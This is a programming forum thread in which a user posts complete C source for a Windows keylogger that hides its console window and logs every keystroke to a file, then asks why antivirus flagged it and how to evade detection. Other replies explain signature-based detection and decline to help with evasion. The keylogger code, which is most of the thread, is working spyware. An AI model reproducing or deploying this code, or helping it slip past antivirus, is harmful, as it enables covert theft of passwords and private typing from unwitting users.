Like Tree3Likes
  • 1 Post By CommonTater
  • 2 Post By CommonTater

Spyware ?

This is a discussion on Spyware ? within the Windows Programming forums, part of the Platform Specific Boards category; I found this code on Google ... it's supposed to be a keylogger (I was just curious about a code ...

  1. #1
    INSANE INSIDE ekosix's Avatar
    Join Date
    May 2010
    Location
    Rio de Janeiro, Brazil
    Posts
    44

    Question Spyware ?

    I found this code on Google
    ... it's supposed to be a keylogger (I was just curious about a code example...)
    Code:
    //Includes
    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>
    #include <windowsx.h>
    #include <time.h>
    //Definitions
    #define LogLength 100
    #define FileName "logs.txt"
    //Prototype
    int get_keys(void);
    //MAIN
    int main(void)
    {
        //Stealth Stuff
        HWND stealth;
        AllocConsole();
        stealth=FindWindowA("ConsoleWindowClass",NULL);
        ShowWindow(stealth,0);   
    
    
        // I.D.K. Stuff
    
        FILE *file;
        file=fopen(FileName,"a+");
        time_t theTime=time(0);
        fputs("\n#\n##\n###\n#####################\n###Started Logging @@@ ", file);
        fputs(ctime(&theTime),file);
        fputs("\n#####################\n###\n##\n#\n", file);
        fclose(file);
    
    
        //Logging Stuff
        int t = get_keys();    
    return t;
    }
    int get_keys()
    {    
    int freadindex;
    char *buf;
    long len;
    FILE *file;
    file=fopen(FileName,"a+");
    short character;
    while(1)
    {
    Sleep(5);    
    for(character=8;character<=222;character++) {
        if(GetAsyncKeyState(character)==-32767) {
            FILE *file;
            file=fopen(FileName,"a+");
            if(file==NULL) {
                return 1;
            }
            if(file!=NULL) {
                if((character>=39)&&(character<=64)) {
                    fputc(character,file);
                    fclose(file);
                    break;
                }
                else if((character>64)&&(character<91)) {
                    character+=32;
                    fputc(character,file);
                    fclose(file);
                    break;
                }
                else
                {
                    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;    
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;                                            
    case VK_RETURN:
    fputs("\n[ENTER]\n",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;    
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs(":;",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("?",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("~",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("{\r\n",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("\\",file);
    fclose(file);
    break;                                
    case VK_OEM_6:
    fputs("}",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("\"",file);
    fclose(file);
    break;
    case 187:
    fputc('+',file);
    fclose(file);
    break;
    case 188:
    fputc(',',file);
    fclose(file);
    break;
    case 189:
    fputc('-',file);
    fclose(file);
    break;
    case 190:
    fputc('.',file);
    fclose(file);
    break;
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("\n[CAPSLOCK]\n",file);
    fclose(file);
    break;
    default:
    fclose(file);
    break;
    }
                }
            }
        }
    }
    
    
    fclose(file);
    }
    
    return EXIT_SUCCESS;                            
    }
    When I compiled it, my antivirus blocked it as a Trojan...
    But the question is: HOW and WHY did that happen?

  2. #2
    Banned
    Join Date
    Aug 2010
    Location
    Ontario Canada
    Posts
    9,547
    When I compiled it, my antivirus blocked it as a Trojan...
    But the question is: HOW and WHY did that happen?
    Oh probably because it IS a virus that is commonly dropped by trojans.

    It opens an invisible window, it acesses the keyboard directly, it writes to a file... all the stuff of keylogging.

    Your curiosity about the code is understandable... but so is the operating system's reaction.

  3. #3
    INSANE INSIDE ekosix's Avatar
    Join Date
    May 2010
    Location
    Rio de Janeiro, Brazil
    Posts
    44
    So, you're saying my antivirus detected an uncommon activity from the executable through its actions?

  4. #4
    Banned
    Join Date
    Aug 2010
    Location
    Ontario Canada
    Posts
    9,547
    Quote Originally Posted by ekosix View Post
    So, you're saying my antivirus detected an uncommon activity from the executable through its actions?
    None of the actions by itself is a problem. It's not about "uncommon", it's about "dangerous". It detected the combination of actions and decided it's not a good thing.

    Virus scanners for the most part work on known patterns (called "signatures") within code. Certain combinations of machine code will trigger a pattern match and off it goes.
    ekosix likes this.

  5. #5
    INSANE INSIDE ekosix's Avatar
    Join Date
    May 2010
    Location
    Rio de Janeiro, Brazil
    Posts
    44
    Cool!
    Well, so if I want or need to avoid this would it work if I make them "indirectly" or to create some methods "between" them just to outwit?

  6. #6
    Banned
    Join Date
    Aug 2010
    Location
    Ontario Canada
    Posts
    9,547
    Quote Originally Posted by ekosix View Post
    Cool!
    Well, so if I want or need to avoid this would it work if I make them "indirectly" or to create some methods "between" them just to outwit?
    Probably not. Virus writers and virus scanners are in a "cold war"... Or as it was once said: "My kung foo is better than their kung foo"... and everything is in a state of constant improvement (or worsening depending which side you're on).

    Basically the best advice I can give you is to stop messing around with virus code.
    ekosix and Salem like this.

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. Cracking down on Spyware
    By SlyMaelstrom in forum A Brief History of Cprogramming.com
    Replies: 18
    Last Post: 05-06-2006, 02:57 PM
  2. Fake spyware
    By hdragon in forum Tech Board
    Replies: 19
    Last Post: 01-12-2006, 11:44 AM
  3. Spyware
    By Micko in forum Tech Board
    Replies: 6
    Last Post: 04-22-2005, 02:09 AM
  4. IE is spyware
    By Salem in forum A Brief History of Cprogramming.com
    Replies: 8
    Last Post: 02-28-2005, 03:22 PM

Tags for this Thread


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21